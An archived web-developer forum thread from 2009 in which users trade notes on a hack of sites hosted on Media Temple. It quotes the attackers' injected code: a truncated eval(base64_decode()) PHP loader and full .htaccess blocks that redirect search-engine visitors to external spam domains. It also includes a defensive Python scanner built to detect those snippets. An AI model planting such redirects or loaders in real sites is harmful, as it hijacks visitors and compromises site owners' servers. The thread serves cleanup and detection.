This is an archived forum and the content is probably no longer relevant, but is provided here for posterity.
November 10, 2009 8:54am
#31 / Nov 11, 2009 6:02am
kokako, same procedure: report to MT, change passwords, check local computer for viruses and malware, replace all files with known good copies of EE, upgrading to the latest version/build in the process.
#32 / Nov 11, 2009 12:18pm
I’m also on the affected MT grid server. I could only find injected code in all my index.php files (root level) and .htaccess files (root level). I changed passwords and removed the code. Everything seems to be good now. I’m still waiting to hear back from MT on how the hackers gained access… Will report back if I hear anything.
#33 / Nov 11, 2009 3:25pm
Please do. We have no reason to believe that EE was involved in these attacks, but we definitely like to stay on top of things in matters of security.
#34 / Nov 11, 2009 3:33pm
No, I don’t think EE was either. Actually, I believe it was targeted at WordPress installs. The script/attacker injected the code right in the middle of the index.php file after a </body> tag in a PHP statement. As far as I can tell it didn’t get into anything else. The PHP error actually did us a favor in recognizing that the file had been modified.
#35 / Nov 11, 2009 3:46pm
Yes. From the reports we’ve had so far, it looks like the attackers had FTP login information, so that’s something to bear in mind. As I’ve said, the ball really is in MT’s court here.
#36 / Nov 11, 2009 3:50pm
Yes, absolutely, the ball is in MT’s court. Just posted here for reference.
#37 / Nov 11, 2009 3:53pm
Very good. Let’s just wait for what they have to say, then.
#38 / Nov 11, 2009 6:30pm
what is the code that was injected in .htaccess? I know the code injected into the index.php file looked like: <!--5edfgh345--><?php eval(base64_decode("JGw9Imh0dHA6Ly90b3VycmV2aWV3cy5hc2lhL2xpbmtzMi9saW5r ...
but what does it look like in .htaccess?
thanks
#39 / Nov 11, 2009 6:34pm
what is the code that was injected in .htaccess?
AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://you-search.in/in.cgi?4&parameter=sf [R,L]
#40 / Nov 11, 2009 6:37pm
that was fast. just the orange text then? mine looked like this:
AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://allvideo.org.uk/in.cgi?4&parameter=sf [R,L]
So in my case the code injected was just:
RewriteRule .* http://allvideo.org.uk/in.cgi?4&parameter=sf [R,L] ?
#41 / Nov 11, 2009 6:38pm
No, not just the orange text. Everything I posted was injected.
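A check built from the snippets quoted in posts #38 to #41, added here as an example and not code from any poster, EllisLab or Media Temple: it walks a document root and flags eval(base64_decode( loaders in PHP files, PHP handlers mapped onto non-PHP extensions, and referer-conditioned redirects to an external URL in .htaccess files. The function names are illustrative assumptions.

```python
import os
import re
import sys

# Added example (names are illustrative); patterns come from the snippets quoted in this thread.
PHP_LOADER = re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I)
ADD_HANDLER = re.compile(r"^[ \t]*AddHandler[ \t]+application/x-httpd-php\S*(.*)$", re.I | re.M)
REFERER_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}", re.I)
REWRITE_RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)", re.I)

def scan_php(text):
    """Report each eval(base64_decode( loader with its 1-based line number."""
    lines = (text.count("\n", 0, m.start()) + 1 for m in PHP_LOADER.finditer(text))
    return ["eval(base64_decode( at line %d" % n for n in lines]

def scan_htaccess(text):
    """Report PHP handlers on non-PHP extensions and referer-gated external redirects."""
    findings = []
    for m in ADD_HANDLER.finditer(text):
        extra = [e for e in m.group(1).split() if e.lower() != ".php"]
        if extra:
            findings.append("PHP handler on non-PHP extensions: " + " ".join(extra))
    referer_gated = False
    for line in text.splitlines():
        rule = REWRITE_RULE.match(line)
        if REFERER_COND.match(line):
            referer_gated = True          # conditions bind to the next RewriteRule
        elif rule:
            if referer_gated and re.match(r"https?://", rule.group(1), re.I):
                findings.append("referer-gated redirect to " + rule.group(1))
            referer_gated = False         # a rule consumes the pending conditions
    return findings

def scan_tree(root):
    """Walk a docroot and return {path: findings} for .htaccess and .php files."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name == ".htaccess" or name.lower().endswith(".php"):
                path = os.path.join(folder, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
                hits = scan_htaccess(text) if name == ".htaccess" else scan_php(text)
                if hits:
                    report[path] = hits
    return report

if __name__ == "__main__":
    for path, hits in sorted(scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items()):
        print(path, *hits, sep="\n    ")
```

Findings are leads for manual review: a legitimate hotlink rule can also match the referer pattern, and a clean scan does not replace restoring files from known good copies.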
#42 / Nov 11, 2009 6:43pm
thanks. much appreciated.
#43 / Nov 11, 2009 7:09pm
Hi-
Just curious to see if you all received any word on this issue from Media Temple? Thanks!
#44 / Nov 11, 2009 7:17pm
@Adam - Still waiting…
#45 / Nov 11, 2009 7:25pm
OK, thanks. We definitely appreciate your effort on this one 😊